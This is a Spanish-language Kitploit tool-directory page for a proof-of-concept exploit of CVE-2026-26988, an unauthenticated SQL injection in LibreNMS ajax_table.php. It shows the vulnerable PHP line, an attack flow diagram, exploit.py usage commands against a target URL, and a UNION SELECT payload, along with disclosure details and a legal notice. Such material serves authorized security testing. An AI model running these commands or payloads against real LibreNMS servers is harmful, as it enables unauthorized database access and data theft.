Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-26988-LibreNMS-SQLi — Prueba de concepto de explotación para inyección SQL no autenticada en LibreNMS ajax_table.php, que demuestra técnicas de inyección ciega basadas en tiempo y en booleanos para pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/mbanyamer/cve-2026-26988-librenms-sqli
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y Educación
GitHubmbanyamer/cve-2026-26988-librenms-sqli

CVE-2026-26988-LibreNMS-SQLi

Prueba de concepto de explotación para inyección SQL no autenticada en LibreNMS ajax_table.php, que demuestra técnicas de inyección ciega basadas en tiempo y en booleanos para pruebas de seguridad autorizadas.

Ver Repositorio
15hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Author Role Country Platform Vulnerability CVE CVSS Status

CVE-2026-26988 – PoC de Inyección SQL No Autenticada en LibreNMS

Inyección SQL no autenticada en ajax_table.php de LibreNMS a través del parámetro de búsqueda de direcciones IPv6.

  • Versiones afectadas: LibreNMS ≤ 25.12.0
  • Corregido en: LibreNMS ≥ 26.1 (commit 15429580baba03ed1dd377bada1bde4b7a1175a1)
  • CVSS v4.0: 9.3 Crítico
    CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N
  • CWE: CWE-89 (Neutralización incorrecta de elementos especiales utilizados en un comando SQL – Inyección SQL)

Resumen de la Vulnerabilidad

El parámetro address cuando search_type=ipv6 se divide por / en dirección y prefijo.
El prefijo se concatena directamente en una consulta SQL sin escape:

$sql .= " AND ipv6_prefixlen = '$prefix'";

Una comilla simple (') en la parte del prefijo permite salir del literal de cadena → inyección SQL arbitraria.

Diagrama del Flujo del Ataque

flowchart TD
    A[Atacante] -->|1. HTTP POST a /ajax_table.php| B[Servidor Web LibreNMS]
    B -->|2. id=address-search & search_type=ipv6| C[Analizar parámetro address]
    C -->|3. Dividir por '/' → $address / $prefix| D[Construir SQL vulnerable]
    D -->|4. Concatenar: ipv6_prefixlen = '$prefix'| E[MySQL / MariaDB]
    E -->|5. Ejecutar consulta inyectada| F[Devolver resultados / error / retardo]
    F -->|6. El atacante observa la respuesta / el tiempo| A

    subgraph "Punto de Inyección"
        D
    end

    style D fill:#ff4d4d,stroke:#333,stroke-width:2px,color:#fff

Uso del Prueba de Concepto

Requisitos

  • Python 3.x
  • Biblioteca requests (pip install requests)

Prueba Básica (Error de Sintaxis / 500)

python3 exploit.py http://target/librenms --test

Confirmación Ciega Basada en Tiempo (Recomendado)

python3 exploit.py http://192.168.1.50/librenms --time

→ Si la respuesta tarda más de 5–6 segundos → vulnerable

Prueba Ciega Basada en Booleano

python3 exploit.py http://target/librenms --boolean

Ejemplo de Payload Personalizado

python3 exploit.py http://target/librenms --test --payload "64' UNION SELECT database(),user(),version() -- "

Archivos en este Repositorio

  • exploit.py .............. Script principal del PoC (renombrar desde cve-2026-26988-poc.py si es necesario)
  • README.md ............... Este archivo

Divulgación Responsable

  • Reportado: febrero de 2026 (a través de GitHub Security Advisory)
  • Corregido en: commit 15429580baba... → PR #18777
  • Aviso: https://github.com/librenms/librenms/security/advisories/GHSA-h3rv-q4rq-pqcv

Aviso Legal y Ético

Este prueba de concepto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.

NO utilice este código contra ningún sistema o red sin permiso explícito por escrito del propietario.
El uso no autorizado puede violar leyes, incluidas (entre otras) la Computer Fraud and Abuse Act (CFAA) en EE. UU., o legislación equivalente en su país.

Úselo bajo su propio riesgo.


Autor: Mohammed Idrees Banyamer
Instagram: @banyamer_security
Fecha: 20 de febrero de 2026

Descargar herramienta